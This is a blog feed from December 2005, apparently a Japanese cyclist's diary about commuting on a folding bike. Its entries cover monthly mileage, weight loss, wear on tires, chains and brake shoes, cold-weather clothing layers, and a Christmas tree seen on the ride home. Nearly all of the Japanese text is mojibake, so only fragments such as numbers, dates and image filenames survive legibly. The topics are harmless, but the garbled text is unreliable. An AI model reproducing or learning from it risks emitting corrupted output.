    - -ƒI[ƒ‰ƒX©“]װ’‹־ - -2005-12-29T09:01:20Z -2005-12-29T09:00:07Z -tag:www.y-moto.com,2005:/bd-1//1.503 -2005-12-29T09:00:07Z -@¡“ת‚ֵ¡”N‚ּ©“]װ’‹־‚ֽI—¹B‚ֶ‚ט‚ ‚¦... - -y-moto -http://www.y-moto.com/ -birdy@y-moto.com - -©“]װ’‹־ - -@¡“ת‚ֵ¡”N‚ּ©“]װ’‹־‚ֽI—¹B‚ֶ‚ט‚ ‚¦‚¸‚±‚±‚‚ֵ‘ו‚«‚ָ–ּ‚א‚ָ‚­ˆךˆְS(^_^.)

    - -

    @1‚©‚ח‚ּƒf[ƒ^[‚נ‚‚ֶ‚‚י‚ֶ

    - -

    @1@435‚‹‚@7@684‚‹‚
    -@2@352‚‹‚@8@601‚‹‚
    -@3@512‚‹‚@9@766‚‹‚
    -@4@676‚‹‚@10@575‚‹‚@
    -@5@694‚‹‚@11@778‚‹‚
    -@6@658‚‹‚@12@494‚‹‚iזT‚‚ֵj

    - -

    @זT‚‚ֵ‚ּ”Nװ—v‚×7,225‚‹‚@נ”N‚ּ—v‹——£‚ֽ6,316‚‹‚‚ֵ‚·‚©‚ח–ס1,000‚‹‚’צ‘–s‹——£‚×L‚ׁ‚י—\’ט‚ֵ‚·B

    - -

    @³m‚ֹ‚ֽ1`3‚‚ֵBD-1W‚ֵ‚ּ‘–sB4‚©‚ח‚ֽBD-1@’‹־†‚ֵ‚ּ‘–sBˆךנ”N9‚ז‚טBD-1W‚ֵ’‹־‚µ‚ִ‚¨‚ט‚‚µ‚½‚×A10,000‚‹‚’צ‘–s‚µ‚ִAƒI[ƒo[ƒz[ƒ‹‚ֹ–¼‚נ״‚ט‚½HƒJƒXƒ^ƒ€‚ֽ‘S‚­is‚µ‚ִ‚ָ‚¢(*_*)B

    - -

    @”NX—‚¿‚יˆך•‚ּƒAƒNƒeƒBƒrƒƒeƒB‚©‚ֶv‚¢‚«‚גAƒuƒƒO‚נ’‚¶‚ִ‚¢‚כ‚¢‚כ‚ָƒRƒƒ“ƒg‚נ‚א‚ח‚₪‚ֶ‚¢‚¢hƒ‚ֹ‚ָ‚ט‚‚·‚ֻB‚±‚ך‚ֽƒzƒ“ƒg‚ֹ‚ ‚ט‚ׂ½‚¢‚±‚ֶ‚ֵ‚·B<(_ _)>

    - -

    @–¾“ת‚ֵ‘–s‹——£‚ֽm’ט‚³‚¹‚י—\’ט‚ֵ‚·‚×A‘–‚ט‰‚‚ֽ–ˆ”NP—ב‚ֹ‚ָ‚ֱ‚ִ‚¢‚י‰wƒ|ƒ^‚ּ—\’טB‚ַ‚₪‚א³’UA2“ת‚ֶ‚¨“V‹C‚׉צ‚µ‚¢‚‚½‚¢‚ֵ‚·‚ֻB(+_+)@‚¹‚ֱ‚©‚­ט‚ֹ“‚ך‚½ƒtƒ[ƒpƒbƒNƒƒ^2‚ּg—pƒƒ|[ƒg‚א‚ג‚כ‚₪‚ֶv‰ז‚µ‚ִ‚¢‚½‚ּ‚ֹEEEB

    - -

    @‚±‚₪‚ג‚ֱ‚ִ©‚י‚ֶƒzƒ“ƒg‚ֹ1”N‚ֱ‚ִ‚ ‚ֱ‚ֶ‚¢‚₪װ‚ֵ‚·‚ֻB‚¨‚»‚כ‚µ‚ג`B((+_+))

    ]]> - -
    -
    - -‚»‚₪‚¢‚¦‚־‚ ‚ּ˜b‚ּ‘±‚«EEEB - -2005-12-28T09:09:22Z -2005-12-28T08:40:51Z -tag:www.y-moto.com,2005:/bd-1//1.502 -2005-12-28T08:40:51Z -@1”NװU‚ט•װ‚יˆ׃–¡‚ֵAƒuƒƒO‚ֵ‚ ‚ס‚ָ–... - -y-moto -http://www.y-moto.com/ -birdy@y-moto.com - -G‹L - -@1”NװU‚ט•װ‚יˆ׃–¡‚ֵAƒuƒƒO‚ֵ‚ ‚ס‚ָ–‚±‚ס‚ָ–‘‚¢‚ִ‚‚¢‚ט‚‚µ‚½‚×

    - -

    @u‚ ‚ּ˜b‚ֽ‚ַ‚₪‚ָ‚ֱ‚½‚ּv•ׂB

    - -

    @‡@‘ּd•ׂ

    - -

    @ƒuƒƒOn‚‚½“–‰‚ֽ‘ּd‚ֶ‘ּ‰–b—¦‚נ‚¹‚ִ‚‚µ‚½B‘ּd‚ּ‘¸‚נˆךלˆך—J‚µ‚ז‚₪‚ֶv‚ֱ‚ִ‚¢‚½‚ס‚ֵ‚·‚×A‹t‚ֹ‘‰ֱ‚µ‚ִ‚µ‚‚¢‚‚µ‚½(+_+)

    - -

    @‚ַ‚₪‚א‘ו‚«‚­‘ּd‚׸­‚·‚י‚ּ‚ֽז‚טn‚‚ִ‚©‚ח1”N’צ“x‚ֵ‚»‚ךˆָ~‚ֽ‘¸‚נJ‚ט•װ‚µ‚ִ‚¢‚‚·B‘ּ‚ׂ»‚₪‚¢‚₪ƒƒYƒ€‚ֹµ‚ך‚ִ‚µ‚‚₪‚ּ‚©Aס‚ט“¹‚µ‚ִ‘וH‚µ‚·‚¬‚ִ‚¢‚י‚ּ‚©Hiֵ‹‚ֽT‚¦‚ִ‚‚·jBש‚ֹƒuƒƒOn‚‚½“_‚ֵ‚ֽ®‘S‚ֹu‚·‚ֵ‚ֹ’x‚µv‚ֱ‚ִ´‚¶‚¾‚ֱ‚½‚ֵ‚·‚ֻB–ˆ“ת—[H‚×–יH‹‚­‚ֹ‚ָ‚ֱ‚ִ‚µ‚‚₪‚ּ‚ֵ‚»‚ך‚×—ַ‚­‚ָ‚¢´‚¶B

    - -

    @»“_‚ֵ‚ֵֽ‚’li©“]װ’‹־‚·‚י‘Oj‚ֶ”ה‚׳‚י‚ֶ-7`-8kgˆ‚ֵA‘ּ‰–b—¦‚ֽ20%‘Oד‚ֵ„ˆ‚µ‚ִ‚‚·BƒuƒƒOn‚“–‰‚‚ֵ‚ּ…€‚ֹ–‚ט‚ֲ‚ֲ‚ ‚ט‚‚·B‚ג‚ֽ‚ט©“]װ‚ֹז‚ח‚ָ‚¢‚ֶƒ_ƒ‚ָ‚ּ‚ֽ•ׂ©‚ט‚«‚ֱ‚ִ‚¨‚ט‚‚·‚¯‚ך‚ַEEEB‚ֶ‚ט‚ ‚¦‚¸»ףˆ‚ֶ‚¢‚₪‚±‚ֶ‚ֵB

    - -

    @‡A‹”N‚ּ•¨—~ƒƒXƒg‚ּ3‚ֲ‚ּ‚₪‚¿1‚ֲ‚¾‚¯ƒQƒbƒgIINIKE KATO‚ּ‚B‚ ‚ֶ2‚ֲ‚ֽ‚‚½‚¢‚¸‚ך‚©‚ֹEEEB‚‚½V‚½‚ֹ—ˆ”N‚ֹ‚¯‚½u•¨—~ƒƒXƒgv‚ֵ‚אל‚כ‚₪‚©‚ָ‚ֶB

    - -

    @‡B—י‚נ•t‚¯‚ִ‘–‚ֱ‚½‚ָ‚ס‚ֵ‚·‚×Aר‰‚ּ’צ‚ֽ‚ֶ\‚µ‚‚·‚ֶEEEB

    - -

    - -

    @‹·˜HEEE@ר‰ג‘וB‘¶‚נ@’m‚µ‚ִ‚­‚ך‚‚·B

    - -

    @²“¹˜Hi•א“¹jA— ’‚טEEE›@װ‚ּ‘–s‰¹‚ֵ‚©‚«ֱ‚³‚ך‚ִ‚µ‚‚¢‚‚·B

    - -

    @²“¹˜Hiװ“¹jEEE~@ˆ׃–¡–³‚µB

    - -

    @¢A”LEEE›@‚ ‚¯‚ִ‚±‚ֱ‚¿‚נ©‚ִ‚¢‚יB

    - -

    @‚»‚ס‚ָ‚ם‚¯‚ֵ‚µ‚½B©•ׂא•א‚¢‚ִ‚¢‚י‚ֶAד‚כ‚©‚ח©“]װ‚×—ˆ‚ִƒrƒbƒNƒ‚·‚י‚±‚ֶ‚ׂ ‚י‚ּ‚ֵ•t‚¯n‚‚½‚ּ‚ֵ‚·‚×Aֵ‘ו‚ּד“_‚ׂ ‚ֱ‚½‚ּ‚ֵ‚·EEEB

    - -

    @u‚₪‚י‚³‚¢v@‘‚­‚»‚ך‚ֹ‹C•t‚­‚׳‚«‚ֵ‚ ‚ֱ‚½EEEB

    - -

    @1”Nװ‚¢‚כ‚ס‚ָ˜b‚ׂ ‚ט‚‚µ‚½‚ֻiƒOƒ_ƒOƒ_‘‚¢‚ִ‚י‚¾‚¯‚¾‚¯‚ַjB–¾“ת‚ש“]װ’‹־ƒI[ƒ‰ƒX‚ּ—\’טB

    ]]> - -
    -
    - -ֱ–ױ•i‚ּץ–½iƒ^ƒCƒ„Aƒ`ƒF[ƒ“Aƒuƒ[ƒLƒVƒ…[j - -2005-12-27T08:59:27Z -2005-12-27T08:45:45Z -tag:www.y-moto.com,2005:/bd-1//1.498 -2005-12-27T08:45:45Z -@©“]װ‚ֱּ–ױ•i‚ֹ‚ֲ‚¢‚ִl‚¦‚ִ‚‚ז‚₪‚ֶv... - -y-moto -http://www.y-moto.com/ -birdy@y-moto.com - -ƒƒ“ƒeƒiƒ“ƒX - -@©“]װ‚ֱּ–ױ•i‚ֹ‚ֲ‚¢‚ִl‚¦‚ִ‚‚ז‚₪‚ֶv‚¢‚‚·B“–‘R©“]װ‚א‘–‚ֱ‚ִ‚¢‚ך‚־ֱ–ױ‚·‚י•”•ׂ×o‚ִ‚«‚‚·‚×Aֱ–ױ•”•ּׂץ–½‚ֱ‚ִ‚ַ‚ּ‚­‚ח‚¢‚©U‚ט•װ‚יB

    - -

    683.jpg

    - -

    @ֱ–ױ•”•ֶׂl‚¦‚ח‚ך‚י‚ּ‚ֽƒ^ƒCƒ„Aƒ`ƒF[ƒ“Aƒuƒ[ƒLƒVƒ…[Bµ–§‚ֹ¾‚₪‚ֶ‘¼‚א‚ ‚ט‚‚·‚¯‚ַA‚ֶ‚ט‚ ‚¦‚¸3“_‚ֹi‚ֱ‚ִl‚¦‚‚·B

    - -

    @ƒ^ƒCƒ„EEEƒtƒƒ“ƒg‚ֶƒƒA‚ֵ‚ֽ¸‚ט•‚בS‘Rˆב‚₪BƒzƒC[ƒ‹‚²‚ֶ‚ֱ‚©‚¦‚׀‚ֱ‚©‚¦‚µ‚ִ‚½‚ּ‚ֵנ·ת‚×–¢’טBg—pƒ^ƒCƒ„‚ֽƒpƒiƒ[ƒT[ƒpƒZƒ‰‚ֶƒVƒ…ƒƒ‹ƒxƒ}ƒ‰ƒ\ƒ“18~1.5
    -BƒƒA‚ֽ—¼•‚ֶ‚א1,500‚‹‚ˆָד‘–‚י‚ֶ‘“–ƒ„ƒo‚­‚ָ‚ֱ‚ִ‚­‚יBƒVƒ…ƒƒ‹ƒxƒ}ƒ‰ƒ\ƒ“‚ֽNewƒfƒUƒCƒ“‚ֹ‚ָ‚ֱ‚ִ‚©‚חA¸‚ט‚ב‚¢‚ז‚₪‚ָ‹C‚ׂ·‚יB‹‚³‚ּ‚¹‚¢‚©‰ִך‚ּƒ^ƒCƒ„‚ּ¸‚ט‚ֽ‚·‚³‚‚¶‚©‚ֱ‚½BƒƒA‚ֹ”ה‚׳‚י‚ֶƒtƒƒ“ƒg‚ֽ‚‚¾‚‚¾ƒCƒP‚יB

    - -

    @‹˜_jƒƒA2,000‚‹‚‘Oד@ƒtƒƒ“ƒg@•s–¾

    - -

    @’EEEƒ^ƒCƒ„‚ּם—‚ֶ‘–‚ט•‚ֵˆב‚₪B

    - -

    @ƒ`ƒF[ƒ“EEE3/28A9/19‚ֹנ·B‘ו‘ּ”¼”N’צ“x‚©Hץ–½‚ֽ5,000km’צ“x‚ֶ¾‚ם‚ך‚‚·‚×A‚א‚ֱ‚ֶ’Z‚¢‚ז‚₪‚ָ‹C‚ׂ·‚יB‚±‚ּˆ‚ּƒTƒCƒNƒ‹‚ּנ·‚ֵ‚אƒ`ƒF[ƒ“‚ּL‚ׁ‚ֽׂ‚ֱ‚«‚ט‚ֶ‚ז‚­‚ם‚©‚יB‚±‚ך‚א‘–‚ט•‚ֹ‚ז‚ֱ‚ִץ–½‚אˆב‚₪‚ס‚ֵ‚ֽ‚ָ‚¢‚©‚ֶv‚¢‚‚·B—]vp‚¬‘«‚µ‚ָ‚ס‚©‚ג‚ֱ‚ִ‚‚·‚ּ‚ֵL‚ׁ‚ג‚·‚¢‚ּ‚ֵ‚ֽ‚ָ‚¢‚©‚ֶv‚¢‚‚·B

    - -

    @‹˜_j3,000‚‹‚`4,000‚‹‚BiL‚ׁ‚½ƒ`ƒF[ƒ“‚ֽƒXƒvƒƒPƒbƒg‚נ‚‚יj

    - -

    @’EEE‘–‚ט•‚ֵ‘S‘Rˆב‚₪

    - -

    @ƒuƒ[ƒLƒVƒ…[EEEƒ^ƒCƒ„‚ֶ“¯‚¶‚­ƒtƒƒ“ƒg‚ֶƒƒA‚ֶ‚ֵ‚ֽ¸‚ט•‚׈ב‚₪BƒƒA‚ֽ7/19A12/13‚ֹנ·Bƒtƒƒ“ƒg‚ֽ7/19‚ּ‚Bƒm[ƒ}ƒ‹‚ּƒuƒ[ƒLƒVƒ…[‚ז‚ט‚אƒJƒvƒƒI‚ּƒuƒ[ƒLƒVƒ…[‚ֽ‚¿‚ֽ‚¢‚¢‚ֶ‚ֽv‚₪‚×A‰J‚ָ‚ַ‚ֵ‚ֽƒƒ€‚ֹƒhƒƒhƒ‚ּƒVƒ…[‚ּƒJƒX‚ׂ±‚ׁ‚ט‚ֲ‚¢‚ִ‚¢‚יB

    - -

    @‹˜_j©‚ִ–³‚¢‚ז‚₪‚¾‚ֱ‚½‚ח‘¦נ·Bi‹——£AתײW‚ָ‚µj‰J’†ƒ‰ƒCƒh‚ֽ—v’ˆ׃I

    - -

    @‚±‚₪‚ג‚ֱ‚ִ‚‚י‚ֶAƒƒA‚ֹ•‰’S‚ׂ¢‚ֱ‚ִ‚¢‚י‚ז‚₪‚ָ´‚¶B’Pƒ‚ֹ¾‚₪‚ֶuƒƒAƒuƒ[ƒLg‚¢‚·‚¬v‚ֶ¾‚₪‚±‚ֶ‚ֵ‚µ‚ו‚₪‚ֻEEEB

    - -

    @ֱ–ױ•iנ·ת‚נ©‚י‚ֶ‚»‚ּl‚ּז‚ט•‚ּƒNƒZ‚׃oƒ‚י([[;)

    ]]> - -
    -
    - -¡T‚ֽ166km`G´ - -2005-12-26T01:08:51Z -2005-12-26T00:35:19Z -tag:www.y-moto.com,2005:/bd-1//1.501 -2005-12-26T00:35:19Z -@¡T‚ּֿZ‹——£ 166km@ˆ“®•½‹ֿ‘¬... - -y-moto -http://www.y-moto.com/ -birdy@y-moto.com - -‘–s‹——£•ס - -@¡T‚ּֿZ‹——£ 166km@ˆ“®•½‹ֿ‘¬@19.4km/h@ֵ‚‘¬“x 39.8km/h

    - -

    682.jpg

    - -

    @¡T‚א¦‚©‚ֱ‚½‚ֵ‚·‚ֻB‚‚½”N––‚ֹ‚©‚¯‚ִ‚א¦”g‚׋ְ‚י‚ז‚₪‚ָ‚ּ‚ֵA‚±‚ּ¦‚³‚ֶ‚א‚‚¾‚¨•t‚«‡‚¢‚µ‚ָ‚­‚ִ‚ֽ‚ָ‚ט‚‚¹‚סB

    - -

    @©•ּׂ‘«‰ס‚ט‚נ©’¼‚µ‚½‹‰A‚¾‚¢‚װy‚ֹƒyƒ_ƒƒ“ƒO‚ֵ‚«‚י‚ז‚₪‚ֹ‚ָ‚ט‚‚µ‚½B¦‚­‚ִ‚ֲ‚ז‚×’ֹ‚­‚ִ‚ַ‚₪‚µ‚ז‚₪‚א–³‚©‚ֱ‚½‚ּ‚ֵ‚·‚×A‚±‚ך‚ֵ‰נֱ‚³‚ך‚‚µ‚½B“~‚ֽ‰·“x’²®‚דן‚µ‚¢‚ּ‚ֵ‚·‚×A‚¾‚ס‚¾‚ס‚ֶƒRƒc‚ֲׂ‚©‚‚ִ‚«‚½‚ז‚₪‚ָ‹C‚ׂµ‚‚·B

    - -

    @¦‚³‘־פ‚ֽ“‚¦‚ׂ ‚י‚ז‚₪‚ֵ–³‚¢‚ֶv‚ֱ‚ִ‚‚·B‚ֵ‚·‚©‚חFX‚ֶ‚µ‚ִ©‚י•K—v«‚ׂ ‚י‚ֶv‚¢‚‚·B

    - -

    @“~‚ֹ‚«‚¿‚ס‚ֶ‚µ‚½‰·“x’²®‚ֵׂ‚«‚ך‚־ֿב‚³‚¦‚ָ‚¯‚ך‚־©“]װ‚ֹז‚י‚ֹ‚ֽ‰ץ“K‚ָƒV[ƒYƒ“‚ֵ‚ֽ‚ָ‚¢‚©‚ֶ–§‚©‚ֹv‚ֱ‚ִ‚¨‚ט‚‚·i¾‚א‚©‚©‚ָ‚¢‚µjBˆך”װ•|‚¢‚ּ‚×ֿבAƒAƒCƒXƒo[ƒ“B

    - -

    @c‚ט­‚ָ‚¢¡”N‚ּ©“]װ‚ֹז‚ך‚יƒ`ƒƒƒ“ƒX‚נ–‹i‚µ‚ז‚₪‚ֶv‚ֱ‚ִ‚¨‚ט‚‚·B

    - -

    @ֲl“I‚ֹ‚ֽ—L”n‹L”O‚ּƒfƒB[ƒvƒCƒ“ƒpƒNƒg‚ּ”sם‚ֹƒVƒ‡ƒbƒN‚נף‚¯‚ִ‚¨‚ט‚‚·Bjד‰–³”s‚ּƒOƒ‰ƒ“ƒvƒƒz[ƒX‚ֹ‚ֽ‚ָ‚ט‚‚¹‚ס‚ֵ‚µ‚½Bc‚ט200ƒ[ƒgƒ‹‚ּƒ^[ƒ{ƒGƒ“ƒWƒ“‚ֽ•s”­‚ֵ‚µ‚½‚ֻBƒn[ƒcƒNƒ‰ƒC‚א‚₪‚‚­—¬‚ך‚ֹז‚ֱ‚½‚ֶv‚¢‚‚·‚¯‚ַ‚ֻB

    ]]> - -
    -
    - -ƒNƒƒXƒ}ƒXƒcƒ[‚נ©‚ֹס‚ט“¹ - -2005-12-24T14:34:07Z -2005-12-24T14:35:31Z -tag:www.y-moto.com,2005:/bd-1//1.500 -2005-12-24T14:35:31Z -@‚ג‚ֽ‚ט‚±‚ּƒuƒƒO‚אƒNƒƒXƒ}ƒX‚ֶ‚¢‚₪‚±‚ֶ... - -y-moto -http://www.y-moto.com/ -birdy@y-moto.com - -ס‚ט“¹ - -@‚ג‚ֽ‚ט‚±‚ּƒuƒƒO‚אƒNƒƒXƒ}ƒX‚ֶ‚¢‚₪‚±‚ֶ‚ֵEEEB

    - -

    @¡“ת‚ֽd–‚ּ‹A‚ט‚ֹƒNƒƒXƒ}ƒXƒcƒ[‚נ©‚ֹס‚ט“¹B¡“ת‚ֽƒNƒƒXƒ}ƒXƒCƒuBƒNƒƒXƒ}ƒXƒcƒ[‚ֶ‚¢‚¦‚־“–‘RƒRƒR‚ֵ‚µ‚ו‚₪B

    - -

    677.jpg

    - -

    @u’†R‹£”nךvi”j

    - -

    678.jpg

    - -

    @–¾“ת‚ֽ—L”n‹L”O‚ֵ‚·‚ֻB³–ו‘O‚ֹ‚ֽƒNƒ\¦‚¢’†A‚·‚²‚¢l‚½‚¿‚×ש‚ֹ•ְ‚ס‚ֵ‚¢‚יB¡”N‚ֽ—ˆ‚יl‚ב½‚¢‚ֶv‚¢‚‚·Biש‚ֹ‘O”„‚ט®”„jƒfƒB[ƒvƒCƒ“ƒpƒNƒg‚×–³”s‚ֵƒOƒ‰ƒ“ƒvƒ‚נ§‚·‚י‚ּ‚©H‹v‚µ‚װ‚ט‚ֹƒƒNƒƒN‚·‚י—L”n‹L”O‚ֵ‚·‚ֻ(*^_^*)

    - -

    679.jpg

    - -

    @נ”N‚א’†R‚ֹ—ˆ‚‚µ‚½B‚»‚µ‚ִ¡”N‚אEEEBs“®ƒpƒ^[ƒ“‚×נ”N‚ֶˆך‚ֵ‚·B(^^U‚ג‚ֽ‚ט‚±‚±‚ּƒNƒƒXƒ}ƒXƒcƒ[‚ֽ‘ו‚«‚­‚ִƒLƒƒC‚ֵ‚·‚ֻB

    - -

    680.jpg681.jpg

    - -

    @–¾“ת‚ּ‘וl‚½‚¿‚ּƒNƒƒXƒ}ƒXƒvƒƒ[ƒ“ƒg‚ֽEEEHˆך¶–½l‚¦‚‚·ƒ׃(..)ƒƒ‚ƒƒ‚

    ]]> - -
    -
    - -ƒƒCƒ„ƒƒ“ƒO‚ֱ‚ִ‰½H - -2005-12-26T00:10:09Z -2005-12-24T01:20:10Z -tag:www.y-moto.com,2005:/bd-1//1.499 -2005-12-24T01:20:10Z -@‚ז‚­•·‚­¾—t‚ֵ‚·‚×u©“]װ‚ּ•‘•‚ֽƒƒC... - -y-moto -http://www.y-moto.com/ -birdy@y-moto.com - -ˆ— - -@‚ז‚­•·‚­¾—t‚ֵ‚·‚×u©“]װ‚ּ•‘•‚ֽƒƒCƒ„ƒƒ“ƒO‚×מ–{v‚ֶ‚ ‚י‚×A‚»‚ּƒƒCƒ„ƒƒ“ƒO‚ֱ‚ִ‰½H

    - -

    @ƒƒCƒ„ƒƒ“ƒO‚ֶ‚ֽud‚ֻ’…v‚ּ‚±‚ֶB‘ּ’²‚ג“Vף‚ּ‹}•ֿ‚ָ‚ַ‚ֹ‘־‰‚³‚¹‚י‚±‚ֶ‚×d—v‚ֹ‚ָ‚ֱ‚ִ‚­‚יB“ֱ‚ֹ“~ך‚ֽ¦‚¢‚©‚ח‚ֶ‚¢‚ֱ‚ִˆך‹C‚ֹתט‚ּƒWƒƒƒPƒbƒg‚נ’…‚י‚ּ‚ֽ‚²–@“xB¡“x‚ֽ¾‚נ‚©‚¢‚½‚ֶ‚«‚ֹƒWƒƒƒPƒbƒg‚נ’E‚®‚ֶu¾—ג‚¦v‚נ‚µ‚ִ‚µ‚‚₪B‚ֶ‚ָ‚י‚ֶƒJƒ‰ƒ_‚ֹ•‰’S‚ׂ©‚©‚יBgs‚ֹ‚א‚©‚ָ‚¢B

    - -

    @ˆך”װ‰÷‚ֹ’…‚יƒAƒ“ƒ_[ƒVƒƒƒciƒCƒ“ƒi[j‚ֽ‘¬£«ƒVƒƒƒc‚×–]‚‚µ‚¢B‘¬£«ƒVƒƒƒc‚ּd—v«‚ֽ‰ִ‚ז‚ט‚א‚‚µ‚כ“~‚¾‚ֶv‚¢‚‚·B“~‚ֵ‚אז‚ך‚־¾‚×o‚‚·B‚»‚ּ¾‚×װo‰‚ֶ‚ֶ‚א‚ֹ‚ֶƒJƒ‰ƒ_‚נ—ג‚ג‚·B“ֱ‚ֹ–ָ‘f‚ֽ‚ָ‚©‚ָ‚©£‚©‚ָ‚¢‚ּ‚ֵ¡‚ּת‚ֹ‚ֽ‚©‚ָ‚¢B

    - -

    @ˆך”װ•\‚ֹ’…‚יƒAƒEƒ^[iƒWƒƒƒPƒbƒgj‚ֵ‚·‚×A‹‚‚ח‚ך‚י‚ּ‚ֽ•—‚נ’‚³‚ָ‚¢u–h•—«v‚ֶ“א•”‚ּ”M‚ג…•ׂנ‚·‚־‚ג‚­•\‚ֹ•תo‚·‚יuƒxƒ“ƒ`ƒ[ƒVƒ‡ƒ“v‹@”\B‚±‚ך‚×”ץ‚ם‚ֱ‚ִ‚¢‚י‚±‚ֶB‘O•‚ֽ‚¿‚ו‚ֱ‚ֶ‚ּ•—‚ג‰J‚ָ‚ַ‚נס‚¹•t‚¯‚ָ‚¢‘ֿ‹v«‚ֶA”w’†‚ֽƒEƒGƒA“א‚ֵ¾‚נ‚©‚¢‚ִ‚א‚·‚־‚ג‚­”M‚נO‚ֹ“¦‚ׂ·‚ז‚₪‚ָ‹@”\‚×”ץ‚ם‚ֱ‚ִ‚¢‚י‚א‚ּ‚ֽ‚ג‚ֽ‚ט‚‰¿‚ֵ‚·‚×A“~ך‚ֽ‚»‚₪‚¢‚₪‚ּ‚ׂ ‚ט‚ׂ½‚¢B

    - -

    @ƒ~ƒbƒhƒEƒFƒA[‚ֵ‚·‚×A‚±‚ך‚ֽƒtƒ[ƒX‚גƒxƒXƒg‚ָ‚ַ‚ֵ‰·“x’²®‚ּ–נ„‚נ‚µ‚‚·B‚»‚ס‚ָ‚ֹƒXƒs[ƒh‚נד‚°‚ָ‚¢iƒ|ƒ^ƒƒ“ƒO‚ָ‚ַj¾‚נ‚©‚©‚ָ‚¢‚ז‚₪‚ָף‹µ‚ֵƒAƒEƒ^[‚ּ‰÷‚ֹ’…‚יB

    - -

    @‚»‚ך‚¼‚ךˆב‚₪–נ„‚נ‚½‚¹‚ִA”ק–­‚ֲָ‹«‚ּ•ֿ‰»‚ֹ‘־‰‚·‚י‚»‚ך‚×uƒƒCƒ„ƒƒ“ƒOv‚ֶ¾‚₪B©“]װ‚¾‚¯‚ֵ‚ָ‚­ƒAƒEƒgƒhƒA‚ג“oR‚ָ‚ַ‚ּ•‘•‚א‚»‚ּuƒƒCƒ„ƒƒ“ƒOv‚×מ–{‚ֶ‚ָ‚ֱ‚ִ‚¢‚יB

    - -

    @ˆך‰©•ּׂ‘־ˆ–@

    - -

    @EƒCƒ“ƒi[ƒVƒƒƒci”¼‘³ƒWƒƒ[ƒW‚ג‚sƒVƒƒƒcj{ƒA[ƒ€ƒEƒH[ƒ}[
    -

    - -

    @–ˆ“תז‚י‚ֶ–‡”‘µ‚¦‚י‚בו•ֿB‚ָ‚ּ‚ֵ2,000`3,000’צ“x‚ּƒVƒƒƒc‚ֵ\•ׂ©‚ֶEEEBƒ†ƒjƒNƒ“ֶ’dךEEEB

    - -

    @EƒAƒEƒ^[ƒWƒƒƒPƒbƒgiƒ‚ƒ“ƒxƒ‹@ƒ‰ƒCƒgƒVƒFƒ‹ƒTƒCƒNƒ‹ƒWƒƒƒPƒbƒgj

    - -

    674.jpg

    - -

    @‚‚³‚µ‚­—‚ֹ‚©‚ָ‚ֱ‚½©“]װ—pƒWƒƒƒPƒbƒgB‘O–‚ֶ”w–‚ֶ‚ֵˆב‚₪‘f‚נ”z‚µ‚ִ‚¢‚יB‘O–‚ֽ•‰·«‚ֹ—D‚ך‚½‘fA”w–‚ֹ’‹C«‚ֹ—D‚ך‚½Lk‘f‚ֵ‘OXp¨‚ֵ‚אOKB–h…«‚ֶ›…«‚א‚ָ‚©‚ָ‚©B
    -@
    - Eƒ~ƒbƒhƒEƒFƒA[iƒxƒXƒgj

    - -

    675.jpg676.jpg

    - -

    @ƒXƒ|[ƒcƒI[ƒ\ƒƒeƒB‚ֵ©‚ֲ‚¯‚½2,999‚ּ©“]װ—pƒxƒXƒgB10‰÷{`12‰{‚‚ֵ‚±‚ך‚׃AƒEƒ^[‚ֹ‚ָ‚ֱ‚ִ‚‚µ‚½BƒƒtƒƒNƒ^[‚א”ץ‚¦‚י—D‚ך‚א‚ּBgs«‚א”²QB

    - -

    @‚ֶ‚¢‚₪´‚¶‚ֹ‚ָ‚ֱ‚ִ‚‚·B’‹־‚ֵ‚ֽ–w‚ס‚ַƒ~ƒbƒhƒEƒFƒA[‚ֽg—p‚µ‚‚¹‚סB‚‚ˆך‰©•ָׂ‚ט‚ֹƒƒCƒ„ƒƒ“ƒO‚נˆ׃¯‚µ‚ִ‚¨‚ט‚‚·EEEB

    - -

    ƒƒCƒ„ƒƒ“ƒOiƒ‚ƒ“ƒxƒ‹־‹Lj

    ]]> - -
    -
    - -‹ֹ¦‘־פi‚»‚ּ3j`ח‚ט - -2005-12-22T10:16:18Z -2005-12-22T10:15:14Z -tag:www.y-moto.com,2005:/bd-1//1.497 -2005-12-22T10:15:14Z -@‹ֹ¦‘־פ‚»‚ּ‚R‚ֶ‚µ‚ִAֵד‚ֹ˜Io‚µ‚ִ‚¢... - -y-moto -http://www.y-moto.com/ -birdy@y-moto.com - -ˆ— - -@‹ֹ¦‘־פ‚»‚ּ‚R‚ֶ‚µ‚ִAֵד‚ֹ˜Io‚µ‚ִ‚¢‚י•”•ּׂ–h¦‘־פB‚»‚ך‚ֽuח‚טv‚ֵ‚·Bח•׃iחAסA¨j‚ּ–h¦‘־פ‚נ‘׃‚י‚ֶAƒyƒ_ƒ‹‘†‚®‘«‚אi‚‚ָ‚¢B

    - -

    @–‚ּ‚ט‚ֽƒAƒCƒEƒGƒA‚ׂ ‚י‚©‚ח‚¢‚¢‚ֶ‚µ‚ִA–ג‘ט‚ֽ–‚©‚ח‰÷B©•ֽׂƒlƒbƒNƒEƒH[ƒ}[‚ֵ‘־ˆ‚µ‚ִ‚¢‚‚·BƒtƒFƒCƒXƒK[ƒh‚א“¢‚µ‚‚µ‚½‚ב§‚×ד‚ֱׂ‚ִ‚¢‚י‚ֶƒAƒCƒEƒGƒA‚ד‚ֱ‚ִ‚µ‚‚₪‚ּ‚ֵA—ױ‹@‰•ֿ‚ֹ•@‚‚ֵד‚°‚½‚טAס‚‚ֵ‰÷‚°‚½‚ט‚µ‚ִ‚¢‚‚·B‹\’g‚©‚ֵ‚·B

    - -

    672.jpg

    - -

    @ד‚ֽ¨•׃Bנ”N‚ֽ‰‚‚ִ‚±‚ּƒ^ƒCƒv‚ּƒCƒ„[ƒEƒH[ƒ}[‚נw“‚µ‚‚µ‚½‚×A‰¹‚×E‚¢‚ֹ‚­‚­A’·װ‚µ‚ִ‚¢‚י‚ֶ¨‚×’ֹ‚­‚ָ‚ֱ‚ִ‚­‚יi¦‚³‚©‚ח‚ֵ‚ֽ‚ָ‚¢j

    - -

    104.jpg

    - -

